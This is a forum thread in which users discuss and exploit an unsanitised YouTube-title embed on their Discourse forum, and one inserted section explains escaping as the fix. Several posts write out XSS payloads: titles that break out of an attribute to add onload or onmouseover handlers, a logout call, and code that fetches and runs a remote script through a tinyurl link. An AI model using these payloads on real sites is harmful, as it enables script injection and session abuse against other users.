DiscoBalls doesn't sanitise youtube titles
-
Continuing the discussion from In other news today...:
https://www.youtube.com/watch?v=d10k3iiZ_xk
I'm really beginning to like this guy.
What? Where did the rest of the title go... Oh. oh my.
Well let's see if this turns into another :exploit:
https://youtu.be/iUAXzx8gjyc
Yes!
-
Time for fa-spin on meta.d?
-
As much as I dislike I'd still report stuff like this
-
Your OneBox fucked beats my OneBox fuckup. Well played, sir.
Should I post a bug on Meta.derp?
Filed under: Or should I post a carefully crafted YouTube video?
-
At least it didn't get deleted
-
-
Once they fix onmouseover, try
- onmouseenter
- onmouseleave
Once they fix those, start digging into some of the customer DipYork events that must exist like:
- onBeforeAjaxBullshit
- onAfterJellyPotato
Filed under: On Beyond Golden Pond
-
And here's a very helpful post:
Did that topic get hidden? I'm not finding it on meta.derp.
-
Did that topic get hidden?
Also hilariously fast response time: it got unlisted within the first minute of posting it.
-
Ah, I misunderstood @Salamander's post. I thought he meant YT unlisted the video. Reading comprehension fail.
-
-
Very reasonable thing to do. I wouldn't be surprised if YT scanned uploaded videos for stuff like that, though; given how aggressively they ContentID stuff.
-
Nah, youtube was so on the ball, it removed the first video I tried before it even finished uploading it. Twice.
The first time it complained that I had already uploaded the same video before, the second time I just tried to use a sample video that came with windows and it contentID'd it.
Then I just found some random site to convert the Discoball to a video.
-
YT scanned uploaded videos for stuff like that,
Strangely enough, I don't think they do filter out titles like that. I do know they decrease the findability of videos with titles similar to file names (i.e. "blahblah.mov").
After all, who would expect a site to just spit out the title directly to the page's source?
Edit: 'd and corrected.
-
After all, who would expect a site to just spit out the title directly to the page's source?
Yeah, who would be foolish enough to use untrusted ~~user~~ 3rd-party input like that without sanitizing it?
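An added example (not the forum's or Discourse's own code) of the bug the thread is poking at and its fix: the same OneBox-style embed template, once with the YouTube title pasted in verbatim and once with the title escaped for the attribute and text context it lands in, plus a small attribute scanner that shows the injected `onload` handler only exists in the unescaped output. The markup, the hostile title and the video id are constructed for the demo.

```javascript
// Constructed title of the shape the thread describes: it closes the
// alt attribute early and smuggles in an event handler. Inert on purpose.
const HOSTILE_TITLE = '" onload="/* attacker script */ alert(1)';
const VIDEO_ID = 'd10k3iiZ_xk';

// Escape the five characters that change meaning in HTML attribute
// values and text nodes. Output is safe to drop into a double-quoted
// attribute or between tags; it is NOT a URL or JavaScript escaper.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// The mistake: the third-party title is interpolated verbatim into an
// attribute and into element text (constructed OneBox-like markup).
function renderOneboxUnsafe(videoId, title) {
  return `<a href="https://youtu.be/${videoId}">` +
    `<img src="https://img.youtube.com/vi/${videoId}/hqdefault.jpg" alt="${title}"></a>` +
    `<div class="onebox-title">${title}</div>`;
}

// The fix: same template, every untrusted value encoded for the context
// it is inserted into (URL path segment vs. HTML attribute/text).
function renderOneboxSafe(videoId, title) {
  const id = encodeURIComponent(videoId);
  const t = escapeHtml(title);
  return `<a href="https://youtu.be/${id}">` +
    `<img src="https://img.youtube.com/vi/${id}/hqdefault.jpg" alt="${t}"></a>` +
    `<div class="onebox-title">${t}</div>`;
}

// Minimal attribute-name scanner for the <img> start tag, standing in for
// what a browser's tokenizer would see. Handles quoted and bare values;
// enough for the demo, not a general HTML parser.
function imgAttributeNames(html) {
  const tag = html.match(/<img\b[^>]*>/);
  if (!tag) return [];
  const names = [];
  const attr = /\s([^\s=\/>"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  let m;
  while ((m = attr.exec(tag[0])) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Unescaped: ['src', 'alt', 'onload']  Escaped: ['src', 'alt']
console.log(imgAttributeNames(renderOneboxUnsafe(VIDEO_ID, HOSTILE_TITLE)));
console.log(imgAttributeNames(renderOneboxSafe(VIDEO_ID, HOSTILE_TITLE)));
```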
-
it got unlisted within the first minute of posting it.
How much do you want to bet there is never any acknowledgement that the bug existed, even after it's fixed?
-
-
This post is deleted!
-
Nice find though!
-
We've known about this for ages, but I don't think anybody has bothered to demonstrate an XSS with it until now.
-
FTFM.
-
Try
$('*:empty,p,span,button,div.lazyYT').addClass('fa-spin')
-
Oh god, the lag...
-
Yeah, who would be foolish enough to use untrusted ~~user~~ 3rd-party input like that without sanitizing it?
Yeah, who would have ever thought that would be a bad idea?
@Me. It was fucking me, over two years ago said:
Populating a page with untrusted 3rd party content. What could possibly go wrong with that?
-
-
@Lorne_Kates said:
What is this "fixed" you speak of?
They have generally been pretty prompt at fixing (or at least putting a more-or-less adequate band-aid on) security problems. They haven't always done a good job of looking for related vulnerabilities that should be fixed at the same time, and they certainly haven't fixed the underlying design issues that led to the specific vulnerabilities, but they have patched the actual vulnerabilities as reported.
-
Being able to call
onmouseover="Discourse.user.logout()"
for image links is CLOSED_AS_DESIGNED. You're just doing it wrong if you don't enjoy that.
-
{sigh} Seriously, @riking ? Fucking seriously?
-
WTF did he do to make it not load the title or preview image?
-
Some very helpful time stamps there.
I guess I'll just manually figure out where you both live and then convert the time zones to where I live. Thanks Diss&Curse!
-
WTF did he do to make it not load the title or preview image?
He did it wr-- {checks raw}
Fuck. DiscoFatigue is hitting hard tonight.
-
Some very helpful time stamps there.
Wha-- {looks up} Oh Jesus Christ's Cross Shoved in a Cocksocket-- this fucking forum. Fuck this forum. Fuck it hard and fuck it now.
@apapadimoulis can we just burn the server to the ground completely already?
-
Don't worry, a replacement forum is on its way. And this time it's written in EVEN MORE JAVASCRIPT!
-
NodeBB Confirmed!
Nah, we all knew that. But still :)
-
Don't worry, a replacement forum is on its way. And this time it's written in EVEN MORE JAVASCRIPT!
Javascript is a tool. I'm okay with a building with a glass exterior. I'm not okay with a powdered-glass enema.
-
@Lorne_Kates said:
Javascript is a tool.
That's generous. Well unless, you're using the more expansive definition of "tool" which includes things like "rocks" and "twigs", that animals use to crack open nuts and build nests.
Then I guess, yes, it's a tool. And it can be used to build things. Just like cow pies can be used as a tool to build a house. Granted, everything is still shit... but hey, something was built.
-
-
Even the spellaring is shit!
OK, first off, what the fuck. In every other text box, I get a red squigly when I have a typo. Aparantly not in this one. Is there something that Diso is doing that has disabled this?
Whatever. i'm not a great spleller, but JavaScript is infectious and makes all the things around it even worse. Including my spelling.
-
Aparantly not in this one. Is there something that Diso is doing that has disabled this?
Do you have to ask?
Also, go mis-spell something in a post title.
-
Is there something that Diso is doing that has disabled this?
Yes. It cancels spellcheck until it's done checking for things like @mentions and :emoji:, and until any ajax requests have completed.
-
Oh god, this is awesome.
Can you make one with onload set to run this? (skip the jQuery bit, it's already loaded)
clippy.css (1.3 KB), clippy.min.js (13.0 KB)
Oh, and after agent.show() you'll also want to set it to call agent.animate() at a random time interval... say:
clippy.load('Clippy', function(agent) { agent.show(); setTimeout(function reanimate() { agent.animate(); setTimeout(reanimate, Math.random() * 18e4 + 12e4); }, Math.random() * 18e4 + 12e4); });
edit: damn, the .js attachment got nuked. WTF, discourse? That's some special securi-tay.
-
Okay, renamed that .js attachment to .txt and got it working. Here's teh codez:
var link = document.head.appendChild(document.createElement("link")); link.setAttribute("rel", "stylesheet"); link.setAttribute("type", "text/css"); link.setAttribute("href", "/uploads/default/original/3X/1/e/1e901bea83a371182f6044ed58faee7f9d07225b.css"); link.setAttribute("media", "all"); link.onload = function () { var script = document.body.appendChild(document.createElement("script")); script.setAttribute("type", "text/javascript"); script.setAttribute("src", "/uploads/default/original/3X/c/a/ca9ac19092d2be4c272163b184b01073b37474a0.txt"); script.onload = function () { clippy.load('Clippy', function(agent) { agent.moveTo(window.innerWidth - 200, window.innerHeight - 200); agent.show(); setTimeout(function reanimate() { agent.animate(); setTimeout(reanimate, Math.random() * 9e4 + 3e4); }, Math.random() * 9e4 + 3e4); }); }; };
... how long can a YouTube title be?
Might have to encapsulate that into the script, and just have the YT title create the script element for it.
-
Wonder if it'd work with Cornify.js?
-
...probably... I'm kind of enjoying having my very own Clippy here, though.
-
... how long can a YouTube title be?
Probably not that long I would think (100 characters according to some results). Might have to reference the video, and have the code element eval()'d for it to work....
-
Huh... okay, what if... this has the code to initialize the agent at the end of it:
clippy.min.txt (13.9 KB) https://tinyurl.com/jnj52xh
to invoke:
with(document){body.appendChild(createElement("script")).src="https://tinyurl.com/jnj52xh"}
...eh, still that's probably too long if the limit is 100 characters.
-
probably too long
It appears to be 91 characters! Seems legit?
Edit: Though there's an error, it loads the CSS from the caller's domain, so if it's not what.thedailywtf, it won't load.
-
But I think you'd have to make the title this:
" onload="with(document){body.appendChild(createElement('script')).src='https://tinyurl.com/jnj52xh'}"
which would be too long.
there's an error, it loads the CSS from the caller's domain, so if it's not what.thedailywtf, it won't load.
It works from the browser console in Firefox. Didn't at first, until I made the tinyurl use https, but it does after.
-
with(document){body.appendChild(createElement('script')).src
Don't we have jQuery loaded? Could this be made simpler (idk, don't have the time)
" onload="$(body).append($('<script>').src='https://tinyurl.com/jnj52xh'"
-
You have some imbalanced braces, but even after fixing that my console says no.